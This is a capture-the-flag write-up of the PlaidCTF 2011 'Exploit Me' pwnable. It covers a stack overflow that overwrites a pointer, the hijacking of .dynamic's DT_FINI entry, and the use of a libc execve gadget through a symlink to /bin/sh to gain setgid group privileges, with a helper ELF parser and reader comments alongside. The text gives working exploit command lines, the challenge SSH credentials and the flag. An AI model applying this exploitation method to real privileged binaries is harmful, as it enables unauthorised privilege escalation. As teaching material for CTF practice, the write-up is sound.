PlaidCTF 2011 #23 – Exploit Me :p (200)

Category: pwnables

It seems like AED also has some plans to raise hacker force!
We found this binary as an exploitation practice program in the office, but they forgot to remove the setgid flag on the program.
So we can get the secret key!

ssh username@a5.amalgamated.biz

Username: exp_1
Password: jNKpzFuRLpsIW9xzqNIpCVF1

Summary: .dynamic->FINI overwriting, execl symlink


This is the only function of the program (main only does atoi of 2nd and 3rd arguments):

#include <string.h>

void __cdecl sub_8048575(const char *argv1, int argv2atoi, size_t argv3atoi)
{
  char v3[64];  // [sp+10h] [bp-5Ch]@2 -- 0x40 bytes, sits directly below v4 on the stack
  size_t v4;    // [sp+50h] [bp-1Ch]@2 -- later used as a pointer

  if ( argv3atoi <= 71 )
  {
    v4 = argv3atoi;
    strncpy(v3, argv1, argv3atoi);  // up to 71 bytes into a 64-byte buffer: bytes 64..67 land in v4
    if ( v4 )
      *(int *)v4 = argv2atoi;       // 4-byte write to whatever address v4 now holds
  }
}

Ok, we can overwrite the v4 variable and, because it is used as a pointer, we can write to an arbitrary address. What should we overwrite? One of my tools showed that .dtors is a bad target here, but luckily .dynamic->FINI is fine:

exploitme $ elfinfo exploitme
Info for 'exploitme':
   i DYNAMIC SECTION: 0x80496f4 RW
   + DYNAMIC most probably IS writeable at runtime
   i FINI: 0x8049708
   - STACK IS NOT executable
   i DTORS 0x80496e8 WA, next 0x80496ec [ffffffff00000000]
   - DTORS are not working, bad style found
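As an added illustration (not from the writeup and not the elfinfo tool shown above), here is a small Python parser that performs the same check elfinfo did: it locates the d_val cell of DT_FINI inside .dynamic and decides whether that cell is still writable when the program runs, taking PT_GNU_RELRO into account, since RELRO is the mitigation that would have closed this path. The ELF image it inspects is constructed inline to mirror the addresses above (0x80496f4 / 0x8049708); it is not the real exploitMe binary, and the DT_INIT/DT_FINI values in it are made up.

```python
import struct

PT_LOAD, PT_DYNAMIC, PT_GNU_RELRO = 1, 2, 0x6474E552
PF_W, DT_NULL, DT_FINI = 2, 0, 13

def program_headers(elf):
    """Yield (p_type, p_offset, p_vaddr, p_filesz, p_memsz, p_flags) for a little-endian ELF32."""
    if elf[:5] != b"\x7fELF\x01":
        raise ValueError("only 32-bit ELF is handled here")
    (e_phoff,) = struct.unpack_from("<I", elf, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)
    for i in range(e_phnum):
        t, off, va, _pa, fsz, msz, flags, _al = struct.unpack_from("<8I", elf, e_phoff + i * e_phentsize)
        yield t, off, va, fsz, msz, flags

def find_fini_slot(elf):
    """Return (slot_vaddr, current_DT_FINI, writable) for the d_val cell of DT_FINI in .dynamic;
    writable = in a PF_W PT_LOAD and not under PT_GNU_RELRO (RELRO remaps it read-only after relocation)."""
    phdrs = list(program_headers(elf))
    dyn = next(p for p in phdrs if p[0] == PT_DYNAMIC)  # StopIteration: statically linked, no .dynamic
    def covered(kind, addr):  # is addr inside a segment of this type (and writable, for PT_LOAD)?
        return any(p[0] == kind and p[2] <= addr < p[2] + p[4] and (kind != PT_LOAD or p[5] & PF_W)
                   for p in phdrs)
    for idx in range(dyn[3] // 8):
        d_tag, d_val = struct.unpack_from("<iI", elf, dyn[1] + idx * 8)
        if d_tag == DT_NULL:
            break
        if d_tag == DT_FINI:
            slot = dyn[2] + idx * 8 + 4  # d_val sits right after the 4-byte d_tag
            return slot, d_val, covered(PT_LOAD, slot) and not covered(PT_GNU_RELRO, slot)
    return None

def build_sample_elf(relro=False):
    """Constructed ELF32 image (not the real exploitMe): .dynamic at 0x80496f4 inside an RW segment,
    DT_FINI as the third entry, so its d_val cell lands at 0x8049708 just as in the writeup."""
    dyn_off, dyn_vaddr = 0x200, 0x80496F4
    dynamic = b"".join(struct.pack("<iI", t, v) for t, v in
                       [(1, 0x10), (12, 0x8048400), (DT_FINI, 0x8048790), (DT_NULL, 0)])
    n = len(dynamic)
    segs = [(PT_LOAD, 6), (PT_DYNAMIC, 6)] + ([(PT_GNU_RELRO, 4)] if relro else [])
    phdrs = b"".join(struct.pack("<8I", t, dyn_off, dyn_vaddr, dyn_vaddr, n, n, f, 4) for t, f in segs)
    ehdr = b"\x7fELF\x01\x01\x01" + bytes(9) + struct.pack(
        "<HHIIIIIHHHHHH", 2, 3, 1, 0x8048000, 52, 0, 0, 52, 32, len(segs), 40, 0, 0)
    img = bytearray(dyn_off + n)
    img[:52], img[52:52 + len(phdrs)], img[dyn_off:dyn_off + n] = ehdr, phdrs, dynamic
    return bytes(img)

if __name__ == "__main__":
    slot, fini, writable = find_fini_slot(build_sample_elf())
    print(f"DT_FINI d_val at {slot:#x} (currently {fini:#x}), writable at runtime: {writable}")
```

Pass `build_sample_elf(relro=True)` to see the same layout reported as not writable, which is what a binary linked with full RELRO would look like.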

So, we will overwrite 0x8049708 with whatever we want. Let’s put something there and look at what arguments are passed:

exp_1@a5:~$ ulimit -s unlimited  # disable libc ASLR
exp_1@a5:~$ gdb --args /opt/pctf/exploit/exploitMe "`perl -e 'print "A"x64 . "\x08\x97\x04\x08";'`" "`perl -e 'print 0x41424344'`" 71
(gdb) r
Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
(gdb) x/20xw $esp
0xbfefbcbc:    0x4000e226    0x4001c4e4    0x00000000    0x00000000
(gdb) x/1s 0x4001c4e4
0x4001c4e4 <_rtld_global+1220>:     ""

Oh no, an empty string :( Luckily, there are a lot of gadgets calling execve in libc, and I found an appropriate one:

(gdb) x/2i &execl-12
0x400bcb54 <execle+324>:    mov    %eax,(%esp)
0x400bcb57 <execle+327>:    call   0x400bc870 <execve>
(gdb) p/x $eax
$1 = 0x41424344
(gdb) x/1s &execl-12
0x400bcb54 <execle+324>: "\211\004$\350\024\375\377\377뇐\220UW

Ok, now we just create a symlink to /bin/sh (no arguments are passed to it, so no wrapper is needed) and run the exploit:

exp_1@a5:~$ ln -s /bin/sh $'\211\004$\350\024\375\377\377뇐\220UW
exp_1@a5:~$ /opt/pctf/exploit/exploitMe "`perl -e 'print "A"x64 . "\x08\x97\x04\x08";'`" "`perl -e 'print 0x400bcb54'`" 71
$ id
uid=6001(exp_1) gid=1007(expusers) egid=1008(expkey) groups=1007(expusers)
$ cat /opt/pctf/exploit/key

The flag: K3Ys_t0_15_M1nUtEs_0f_F4mE


  1. Lemon says:

    Thanks a lot for the exploit writeups =)
    Please tell us about the solutions to tasks 2 (Mystery Puzzle 9000), 30 (Sticky Note) and 36 (I’M HUNGRY!..as hell).
    On 2 and 30 we failed completely at recognition, nothing works. And on 36 the problem is apparently with our hearing. We got a 3-second tune, but couldn’t make out what was being sung, something like “fuck you ever fuck fuck you”, but the system wouldn’t accept that as the answer.

  2. 1tchy says:

    Awesome write-up!
